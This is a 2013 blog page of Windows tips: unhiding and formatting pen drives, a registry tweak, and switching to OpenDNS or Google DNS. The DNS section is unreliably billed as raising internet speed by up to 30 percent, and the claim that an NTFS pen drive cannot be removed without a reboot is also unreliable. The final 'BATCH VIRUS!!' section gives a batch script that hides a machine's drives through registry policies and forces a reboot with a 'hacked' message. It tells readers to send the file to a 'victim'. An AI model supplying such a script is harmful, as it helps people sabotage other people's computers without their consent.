Saturday, 26 January 2013

formating pen drive



1) skip the format, just unhide them

Open a dos prompt (Start >> Run >> cmd) and type:
attrib -r -h -s ./s x:\*.*
This will change the attributes of all of the files on the pen drive. Readonly, hidden, and system attributes will be removed. Replace the X: with your pen drive's drive letter. Now you will be able to see them in Explorer, and delete them, without formatting anything.

2) format with DOS commands

Open the DOS prompt (Start >> Run >> cmd)
Type:
FORMAT X: /FS:FAT32 /Q /V:PenDrive
This will reformat the Pen drive, using the FAT32 file system, and label the drive PenDrive. Replace X: with the actual drive letter of your Pen Drive. For more help on this command, type:
FORMAT /?
at the command prompt.


3) format using Windows GUI, Explorer

Open Explorer, go to My Computer, right click on the drive letter and select Format... from the popup menu. Pen drives are usually formatted with the FAT32 file system, but if you're of a mind, you can also use NTFS. But keep in mind, if you use NTFS you won't be able to take the pen drive out, without a reboot.

Enable alert User interface in windows 7

How to enable alert User interface in windows 7?



1. Launch Windows Registry Editor by typing Regedit in Start Menu

2. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM
3. Right-click on the right-hand pane and create the following three DWORD entries and set value for each one:
Animations – set value to 0.
Blur – set value to 0.
UseMachineCheck – set value to 0.
4. Close the Registry Editor
5. Go to the Start Menu, enter “cmd” and press Enter to open the Command Prompt.
6. Type the following commands:
Net Stop uxsms and then press Enter
Net Start uxsms and then press Enter
7. The last step is to right-click on your desktop and choose: Personalize/Windows Colors.

 

INCREASE INTERNET SPEED

How To Increase Internet Speed ?
This method works on all version of Microsoft Windows,
Linux Users have to take hint from this method and have to find the Option their own.
Please follow each step carefully and do not modify any other option, it might stop your internet connection from work so follow the Steps carefully
Follow the Given Steps
1. Open “Control Panel” in Classic View, XP Users .
2. Open “Network Connections” .
3. Select your Network For example Local Area Network or Dial Up whatever .
4. “Right Click” on your Network .
5. Goto “Properties” .
6. Goto “Networking” Tab .
7. Double Click on “Internet Protocol (TCP/IP) .
8. Select the the Option “Use the following DNS server addresses:”
9. Now In “Preferred DNS server” enter any of the following
Open DNS (Recommend)
208.67.222.222
or
GoogleDNS(Slow then Open DNS)
8.8.8.8
10. Now in “Alternate DNS server” enter any of the Following
Open DNS (Recommend)
208.67.220.220
or
GoogleDNS(Slow then Open DNS)
8.8.4.4
11. Now Click OK .
12. Now Again Click OK .
13. If any Box appears click Ok again .
14. Restart Computer and Restart the Connection .
Hurray !! Congratulation :D !! You have now Increased your Internet Speed upto 30 % !!
If you got into any problems then or want share your experience or want to say just thanx you can use comment box below.

BATCH VIRUS!!

Batch Virus Code Creation:

!!!!!!!!!!REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f!!!!!!!!!!!

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim